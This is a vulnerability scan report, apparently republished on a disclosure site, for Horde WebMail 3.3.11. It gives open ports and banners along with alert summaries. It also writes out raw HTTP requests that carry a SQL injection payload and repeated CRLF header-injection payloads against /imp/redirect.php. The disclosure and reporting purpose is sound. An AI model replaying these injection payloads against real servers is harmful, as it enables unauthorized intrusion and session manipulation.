Horde WebMail Version 3.3.11 HTTP Header Injection Report | CWE-113

24 May, 2011
XSS, Cross Site Scripting in Horde WebMail Version 3.3.11, CWE-79, CAPEC-86, DORK, GHDB Report
Generated by Acunetix WVS Reporter (v7.0 Build 20110518)

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

See also Horde WebMail V3.3.11 XSS Report | XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Screen Grab (below) documenting the CWE-113 Reporting using Acunetix 7 May 2011 Build, HTTP Header Injection, Horde WebMail Version 3.3.11

XSS in Horde WebMail Version 3.3.11, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86
Scan of http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Scan details
Scan information
Starttime5/22/2011 10:13:04 AM
Finish time5/22/2011 11:41:16 AM
Scan time1 hours, 28 minutes
ProfileDefault
Server information
ResponsiveTrue
Server bannerMicrosoft-IIS/7.5
Server OSWindows
Server technologiesASP.NET
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
Total alerts found136
High30
 
Medium0
Low39
 
Informational67
 
Knowledge base
List of open TCP ports

Open Port 25 / smtp
Port Banner:
P.home ESMTP MailEnable Service, Version: 5.10-- ready at 05/22/11 10:13:23



Open Port 21 / ftp
No port banner available.

Open Port 53 / domain
No port banner available.

Open Port 80 / http
Port Banner:
HTTP/1.1 200 OKType: text/htmlModified: Sat, 21 May 2011 16:23:04 GMTRanges: bytes: "e07c565cd317cc1:0": Microsoft-IIS/7.5Powered-By: ASP.NET: Sun, 22 May 2011 15:15:11 GMT: close ...


Open Port 110 / pop3
Port Banner:
+OK Welcome to MailEnable POP3 Server
Acunetix Website Audit2



Open Port 135 / msrpc
No port banner available.

Open Port 143 / imap
Port Banner:
* OK IMAP4rev1 server ready at 05/22/11 10:17:14



Open Port 445 / microsoft-ds
No port banner available.

Open Port 3389 / ms-term-serv
No port banner available.

Open Port 8081 / blackice-icecap
No port banner available.

Open Port 8443 / https-alt
No port banner available.
DNS server running
A DNS server is running on UDP port 53.
DNS server running on TCP
A DNS server is running on TCP port 53.
Whois lookup
Whois result for IP address 50.23.106.58:

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '0.0.0.0 - 255.255.255.255'
: 0.0.0.0 - 255.255.255.255: IANA-BLK: The whole IPv4 address space: EU # Country is really world wide: ORG-IANA1-RIPEc: IANA1-RIPEc: IANA1-RIPE: ALLOCATED UNSPECIFIED: The country is really worldwide.: This address space is assigned at various other places in: the world and might therefore not be in the RIPE database.by: RIPE-NCC-HM-MNTlower: RIPE-NCC-HM-MNTroutes: RIPE-NCC-RPSL-MNT: RIPE # Filtered
: ORG-IANA1-RIPEname: Internet Assigned Numbers Authoritytype: IANA: see http://www.iana.org: The IANA allocates IP addresses and AS number blocks to RIRs: see http://www.iana.org/ipaddress/ip-addresses.htm: and http://www.iana.org/assignments/as-numbersmail: bitbucket@ripe.netc: IANA1-RIPEc: IANA1-RIPEref: RIPE-NCC-HM-MNTby: RIPE-NCC-HM-MNT: RIPE # Filtered
: Internet Assigned Numbers Authority: see http://www.iana.org.mail: bitbucket@ripe.netc: IANA1-RIPEc: IANA1-RIPEhdl: IANA1-RIPE: For more information on IANA services: go to IANA web site at http://www.iana.org.by: RIPE-NCC-MNT: RIPE # Filtered



POP3 server running
A POP3 server is running on TCP port 110.
SMTP server running
A SMTP server is running on TCP port 25. Information gathered from this service:
Acunetix Website Audit3
EHLO returns:
250-home [173.193.214.243], this server offers 4 extensions
-AUTH LOGIN
-SIZE 5120000
-HELP
AUTH=LOGIN returns:
211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP
List of file extensions
File extensions can provide information on what technologies are being used on this website.
List of file extensions detected:


php => 6 file(s)
css => 4 file(s)
ico => 1 file(s)
png => 14 file(s)
gif => 6 file(s)
js => 4 file(s)
List of files with inputs
These files have at least one input (GET or POST).


/imp/login.php - 2 inputs
/imp/redirect.php - 2 inputs
/imp/test.php - 1 inputs
List of email addresses
List of all email addresses found on this host.


md@webbplatsen.se
Alerts summary
 
Blind SQL Injection - Unconfirmed
AffectsVariations
/imp/redirect.php1
 
 
CRLF injection/HTTP response splitting
AffectsVariations
/imp/redirect.php29
 
 
Possible sensitive directories
AffectsVariations
/imp/config1
/imp/js/src1
/imp/scripts1
/imp/scripts/SQL1
/imp/scripts/sql1
/js/src1
 
 
Possible sensitive files
AffectsVariations
/imp/test.php1
 
Acunetix Website Audit4
 
User credentials are sent in clear text
AffectsVariations
/imp1
/imp/index.php1
/imp/login.php1
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436)1
/imp/login.php (158764c7d282ec5f81da00419114f313)1
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08)1
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8)1
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae)1
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214)1
/imp/login.php (2a85dcb007870d301225d725fb7aced5)1
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c)1
/imp/login.php (3a784d3148a695e5246e4f7712293772)1
/imp/login.php (4435f865242a495136a5f5376d63a435)1
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45)1
/imp/login.php (733b34e2771d847f3e677868a914fc27)1
/imp/login.php (7f2892c38a099a99d15882e6395df8ed)1
/imp/login.php (81366dbb3a1b19d17070dae7247058f6)1
/imp/login.php (8d2af24adeca98940d4ca72de057c259)1
/imp/login.php (92d3a0adc0d0c42811b54244a0913050)1
/imp/login.php (98144b1b8c67561c22adeba83a43a266)1
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff)1
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38)1
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed)1
/imp/login.php (b0db092b89360e30820e995c6abbbc83)1
/imp/login.php (b3cb8470038a18bddad7a22934963f28)1
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a)1
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67)1
/imp/login.php (eb39b850bb307c9b610a48be2af0d636)1
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc)1
/imp/login.php (fa2cb8a65862e58974030595118192cb)1
/imp/redirect.php1
/imp/test.php1
 
 
Broken links
AffectsVariations
/imp/function.session-regenerate-id1
 
 
Email address found
AffectsVariations
/imp/themes/wps_sober/screen.css1
/themes/wps_sober/screen.css1
 
Acunetix Website Audit5
 
GHDB: Horde Mail
AffectsVariations
/imp1
/imp/index.php1
/imp/login.php1
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436)1
/imp/login.php (158764c7d282ec5f81da00419114f313)1
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08)1
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8)1
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae)1
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214)1
/imp/login.php (2a85dcb007870d301225d725fb7aced5)1
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c)1
/imp/login.php (3a784d3148a695e5246e4f7712293772)1
/imp/login.php (4435f865242a495136a5f5376d63a435)1
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45)1
/imp/login.php (733b34e2771d847f3e677868a914fc27)1
/imp/login.php (7f2892c38a099a99d15882e6395df8ed)1
/imp/login.php (81366dbb3a1b19d17070dae7247058f6)1
/imp/login.php (8d2af24adeca98940d4ca72de057c259)1
/imp/login.php (92d3a0adc0d0c42811b54244a0913050)1
/imp/login.php (98144b1b8c67561c22adeba83a43a266)1
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff)1
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38)1
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed)1
/imp/login.php (b0db092b89360e30820e995c6abbbc83)1
/imp/login.php (b3cb8470038a18bddad7a22934963f28)1
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a)1
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67)1
/imp/login.php (eb39b850bb307c9b610a48be2af0d636)1
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc)1
/imp/login.php (fa2cb8a65862e58974030595118192cb)1
/imp/redirect.php1
 
Acunetix Website Audit6
 
Password type input with autocomplete enabled
AffectsVariations
/imp1
/imp/index.php1
/imp/login.php1
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436)1
/imp/login.php (158764c7d282ec5f81da00419114f313)1
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08)1
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8)1
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae)1
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214)1
/imp/login.php (2a85dcb007870d301225d725fb7aced5)1
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c)1
/imp/login.php (3a784d3148a695e5246e4f7712293772)1
/imp/login.php (4435f865242a495136a5f5376d63a435)1
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45)1
/imp/login.php (733b34e2771d847f3e677868a914fc27)1
/imp/login.php (7f2892c38a099a99d15882e6395df8ed)1
/imp/login.php (81366dbb3a1b19d17070dae7247058f6)1
/imp/login.php (8d2af24adeca98940d4ca72de057c259)1
/imp/login.php (92d3a0adc0d0c42811b54244a0913050)1
/imp/login.php (98144b1b8c67561c22adeba83a43a266)1
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff)1
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38)1
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed)1
/imp/login.php (b0db092b89360e30820e995c6abbbc83)1
/imp/login.php (b3cb8470038a18bddad7a22934963f28)1
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a)1
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67)1
/imp/login.php (eb39b850bb307c9b610a48be2af0d636)1
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc)1
/imp/login.php (fa2cb8a65862e58974030595118192cb)1
/imp/redirect.php1
/imp/test.php1
 
 
Windows Terminal Services server running
AffectsVariations
Server1
 
Acunetix Website Audit7
Alert details
Blind SQL Injection
 
SeverityHigh
TypeValidation
Reported by moduleScripting (Blind_Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
Affected items
/imp/redirect.php
Details
URL encoded POST input loginButton was set to -1" or "3"="3
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=&autologin=0&ie_version=&imapuser=edrriwil&load_frameset=1&loginButton=%24%7binjecthere%7d&new_lang=da_DK&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Acunetix Website Audit8
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=edrriwil&server=pop&horde_logout_token=SX7NiW9kAj-kGWWo8hM1gbRVj5Y&app=imp&logout_reason=badlogin
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 16:03:39 GMT
CRLF injection/HTTP response splitting
 
SeverityHigh
TypeValidation
Reported by moduleScripting (CRLF_Injection.script)
Description
This script is possibly vulnerable to CRLF injection attacks.

HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
Impact
Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies or HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation.
Recommendation
You need to restrict CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers.
Affected items
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=cs_CZ&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Acunetix Website Audit9
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=G-zU3534X9MH1OkaR-Pw-x4ty0Q&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:55 GMT
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=zh_CN&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=wN9VHj4zjEO2C0TR8BCh0BaU-os&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:57 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Acunetix Website Audit10
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&lo
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=RuYfFuLgyCOWLmAlQQqWepUU4NU&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: Horde=d6e932f8e8d339db1a98ae22a9a61407; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:53 GMT
Content-Length: 321
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=atsoewoc&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=atsoewoc&server=pop&horde_logout_token=-kD5soUKvsA66mwPMaVGbRacUcE&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:41 GMT
Content-Length: 485
Acunetix Website Audit11
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=da_DK&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=Ues1GksiKBjr_ID-KW8Ee8vY2Fw&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:14:00 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ggqsiwfl&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit12
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ggqsiwfl&server=pop&horde_logout_token=KowJ1XzmjCnX28fnMeYsi_w1opM&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:44 GMT
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=zh_TW&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=vj2EpqQv9c5mlXuhnALm83XwPE4&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:59 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Acunetix Website Audit13
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=uwbkfapt&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acU
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=uwbkfapt&server=pop&horde_logout_token=D3A2KJAQHXQx4-3RvsKZG2NDrUo&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:37 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 250
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=bg_BG&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=Uddd9JXywL2qaX2qI12LvX7K5SY&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:52 GMT
Content-Length: 485
Acunetix Website Audit14
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=hurcfetk&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url=
Response
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=hurcfetk&server=pop&horde_logout_token=uVHbrt7nsI-2C6IQ2Rs3BhAQUe0&app=imp&logout_reason=badlogin#
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
SomeCustomInjectedHeader: injected_by_wvs
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:39:32 GMT
Content-Length: 485
/imp/redirect.php
Details
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found:
: injected_by_wvs
Request
POST /imp/redirect.php HTTP/1.1
Content-Length: 211
